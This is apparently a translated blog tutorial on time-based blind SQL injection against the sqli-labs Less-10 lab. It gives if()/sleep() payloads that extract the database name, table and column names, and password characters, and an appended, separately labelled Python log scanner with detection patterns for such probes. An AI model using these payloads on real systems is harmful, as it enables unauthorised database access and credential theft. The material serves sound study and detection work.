SQL injection study: time-based blind

Introduction: earlier posts covered injection with echoed output, error-based injection, and Boolean blind injection; this post studies time-based blind injection in detail.

In a previous post I looked at Boolean blind injection. Boolean blind and time-based blind are roughly the same: the injection principle is identical. The difference is that Boolean blind still gets some echo (the page content changes), while time-based blind gets no echo at all; instead, you construct statements and judge the result from how long the page takes to respond. That is time-based blind injection.

First, the functions needed for time-based blind injection:

sleep() / delay function
if(condition,true,false) / returns the true branch when the condition holds, the false branch otherwise
substring("string",start,length)

Those few are the main ones. Here I practice on sqli-labs Less-10, the time-based blind level.

Guess the length of the database name
payload:

?id=1" and if(length(database())>5,1,sleep(10))--+

When the condition fails, the query sleeps ten seconds, which makes the judgement quicker; of course, the sleep() function can also be placed in the branch that runs when the condition succeeds.

Watch the browser's response to determine the length of the database name (if you inject manually, note the response times carefully, otherwise it is no fun...).

Dump the database name
payload:

?id=1" and if((ascii(substr(database(),1,1)))>120,1,sleep(10))--+

Watch the browser's reaction to guess the database name. In fact, time-based blind injection only adds the if function and sleep() on top of Boolean blind; they take the place of the true or false outcome in Boolean blind, and the rest of the statement is roughly the same.

Dump the table name
payload:

?id=1" and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>120,1,sleep(10))--+

Again, observe the browser's response time: if it sleeps 10 seconds, the table-name condition is not correct, so keep trying.

Dump the column name
payload:

?id=1" and if((ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))>100,1,sleep(10))--+

Dump the values
payload:

?id=1" and if((ascii(substr((select password from users limit 0,1),1,1)))>1,1,sleep(10))--+

In fact, you can see that the time-based blind statements are basically the same as the Boolean blind ones; time-based blind just uses an if statement to run a sleep function and judges by the delay. If you understand Boolean blind, time-based blind is easy to understand as well.

Still, it is best to write a script: manual injection is slow and error-prone. The study of time-based blind injection stops here for now; once my scripting ability improves, I will write a script to run it.
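As an added, defender-side example (not part of the original post): the delay-based probes above leave a distinctive trace in the web server's access log. The Python scanner below decodes the query string of each request, flags the indicators that make up these payloads, and uses the recorded request time to tell a mere attempt from one where the sleep() branch actually fired. The log format and the sample lines are constructed for this example, and the indicator patterns are assumptions about what the payloads look like once URL-decoded.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed log format (assumption): Apache combined log with the request
# time in whole seconds (LogFormat "%T") appended as the last field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) (?P<secs>\d+)$'
)

# Indicators taken from the payload shape used in this lesson: a delay function
# inside a conditional, a quote then and/or, and a trailing comment ("--+" decodes to "-- ").
INDICATORS = {
    "delay_function": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "conditional": re.compile(r"\bif\s*\(", re.I),
    "quote_break": re.compile(r"""=\d*['"]\s*(and|or)\b""", re.I),
    "comment_terminator": re.compile(r"(--\s|#)"),
}

def analyze(line, slow_after=5):
    """Parse one access-log line; return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = unquote_plus(urlsplit(m["target"]).query)
    hits = [name for name, rx in INDICATORS.items() if rx.search(query)]
    slow = int(m["secs"]) >= slow_after
    if "delay_function" in hits:
        # The delay function in the input is the signature; a slow response
        # on the same request means the sleep() branch actually executed.
        verdict = "time-blind attempt, delay triggered" if slow else "time-blind attempt"
    else:
        verdict = "slow request, no injection pattern" if slow else "benign"
    return {"ip": m["ip"], "query": query, "indicators": hits,
            "slow": slow, "verdict": verdict}

def scan(lines, slow_after=5):
    """Return the findings for every parseable line that is not benign."""
    return [f for f in (analyze(l, slow_after) for l in lines)
            if f and f["verdict"] != "benign"]

# Constructed sample: two Less-10 style probes, a normal request, and a slow
# but harmless report. Requests 1 and 2 are the first two payloads discussed above.
SAMPLE_LOG = """
203.0.113.7 - - [10/Aug/2019:12:00:01 +0800] "GET /sqli-labs/Less-10/?id=1%22%20and%20if(length(database())%3E5,1,sleep(10))--+ HTTP/1.1" 200 721 10
203.0.113.7 - - [10/Aug/2019:12:00:12 +0800] "GET /sqli-labs/Less-10/?id=1%22%20and%20if((ascii(substr(database(),1,1)))%3E120,1,sleep(10))--+ HTTP/1.1" 200 721 0
198.51.100.4 - - [10/Aug/2019:12:00:13 +0800] "GET /sqli-labs/Less-10/?id=1 HTTP/1.1" 200 721 0
198.51.100.4 - - [10/Aug/2019:12:00:20 +0800] "GET /report?range=all HTTP/1.1" 200 90210 7
""".strip().splitlines()
```

Running `scan(SAMPLE_LOG)` returns three findings: the two probes (the first marked as having triggered the delay) and the slow report, which is kept separate because it carries none of the injection indicators.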


Origin: blog.csdn.net/qq_43431158/article/details/97496092